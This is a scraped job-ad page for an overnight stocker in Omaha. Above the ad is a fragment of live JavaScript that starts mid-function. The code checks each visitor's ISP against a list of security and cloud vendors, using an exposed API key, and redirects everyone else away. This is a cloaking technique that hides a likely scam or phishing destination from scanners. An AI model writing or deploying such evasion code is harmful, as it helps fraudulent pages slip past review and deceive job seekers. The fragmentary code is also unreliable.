Night Stocker
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a dedicated Night Stocker to join our team in Omaha, Nebraska. In this role, you will be responsible for ensuring shelves are fully stocked, organized, and visually appealing during overnight hours.
Key Responsibilities:
- Unload delivery trucks and accurately stock merchandise on shelves
- Maintain organized and clean storage and sales areas
- Assist with inventory counts and restocking as needed
- Ensure safety protocols are followed during stocking activities
- Support team members in achieving store presentation standards
Skills Needed:
- Attention to detail and strong organizational skills
- Ability to work independently and efficiently during overnight shifts
- Good physical stamina to lift and move heavy items
- Effective communication and teamwork skills
- Dependability and punctuality
Benefits:
- Competitive pay
- Flexible overnight schedule
- Staff discounts and rewards
- Opportunities for advancement
- Supportive team environment